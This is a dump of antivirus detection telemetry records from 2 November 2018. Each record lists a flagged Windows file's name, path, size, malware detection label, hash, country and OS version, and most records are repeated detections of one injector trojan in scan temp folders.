  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:49:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dealplylive.exe.vir', filepath='\\\\?\\C:\\AdwCleaner\\Quarantine\\C\\Program Files (x86)\\DealPlyLive\\Update\\DealPlyLive.exe.vir', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:27:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Users\\X\\AppData\\Local\\NTServices\\mSiexec64.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T16:44:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-125745-fc570e6e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-125745-FC570E6E', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:00:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-144937-db9e2abc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-144937-DB9E2ABC', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='62d7835ba92d38b165a02f6b16f881f7be7c6931fbda01a4ff38506bf7421a96', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T09:36:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-021917-b62ed265', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ab8872a9\\AVSCAN-20181102-014132-E3C7FCE8\\AVSCAN-20181102-021917-B62ED265', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:19:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-225318-a4ecc411', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23e6a456\\AVSCAN-20181102-225227-9F435123\\AVSCAN-20181102-225318-A4ECC411', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:23:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051530-4985f59d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051530-4985F59D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053246-b333533d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053246-B333533D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060140-bce42c8b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060140-BCE42C8B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lzpk_0943187284.doc', filepath='G:\\GPArhiv\\LZPK_0943187284.doc', filesize=128000, name='W97M/Agent.06750161.#M1.#R1'), hash='70d7c2334ce913dde554ec5770a502c593f574eaad533574b432b16f5815a535', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T18:33:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050731-2c2131ec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050731-2C2131EC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054646-a7843dbc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054646-A7843DBC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053122-812eca86', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053122-812ECA86', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='65cca0d7b8d1990217f665a6f68376c406723029e08a6c501a0bc27b41674cc7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\65CCA0D7B8D1990217F665A6F68376C406723029E08A6C501A0BC27B41674CC7', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='65cca0d7b8d1990217f665a6f68376c406723029e08a6c501a0bc27b41674cc7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:58:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='C:\\Users\\X\\Downloads\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T17:21:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061351-70167a8f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061351-70167A8F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053106-77727562', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053106-77727562', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120524-1382b45c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-115910-EAFC0947\\AVSCAN-20181102-120524-1382B45C', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-181824-a2ea8470', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c7d6212d\\AVSCAN-20181102-181800-9ED3AD10\\AVSCAN-20181102-181824-A2EA8470', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:18:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-124548-7737e589', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-124548-7737E589', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:48:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='winlogon.exe', filepath='E:\\WINDOWS\\$NtServicePackUninstall$\\winlogon.exe', filesize=576000, name='W32/Sality.AT.#M1.#R1'), hash='66c1996281ae46ee73055c0ee81be238551ce6b634f2f6dec75d0adb0abc0764', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061321-5e86ce18', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061321-5E86CE18', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055050-39416942', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055050-39416942', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052106-11a9aef7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052106-11A9AEF7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055527-de1b64c9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055527-DE1B64C9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050445-c8d20ae7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050445-C8D20AE7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060434-24217d0b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060434-24217D0B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054435-59cb3e40', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054435-59CB3E40', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054658-aed5b1bc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054658-AED5B1BC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060157-c69d7518', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060157-C69D7518', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062029-5dcce607', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062029-5DCCE607', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052353-753d7bc7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052353-753D7BC7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052442-9261fe28', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052442-9261FE28', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061706-e49ad8ab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061706-E49AD8AB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051323-fe032858', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051323-FE032858', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060324-fadc3e61', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060324-FADC3E61', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060836-b4956e6a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060836-B4956E6A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051336-05c5130e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051336-05C5130E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060247-e45a2cbf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060247-E45A2CBF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052640-d8a82016', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052640-D8A82016', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060311-f2f78b4a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060311-F2F78B4A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052835-1d5e83b9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052835-1D5E83B9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051820-aea4e43a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051820-AEA4E43A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055614-fa862a35', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055614-FA862A35', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051846-be3c9d3e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051846-BE3C9D3E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051616-64ecaeba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051616-64ECAEBA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055729-26f0bbbf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055729-26F0BBBF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053443-f8ec4a71', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053443-F8EC4A71', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062308-bc6c4c75', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062308-BC6C4C75', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051218-d6dc1b90', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051218-D6DC1B90', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055737-2b9f2063', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055737-2B9F2063', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062150-8e014783', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062150-8E014783', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:49Z'), dt=datetime.date(2018, 11, 2)),
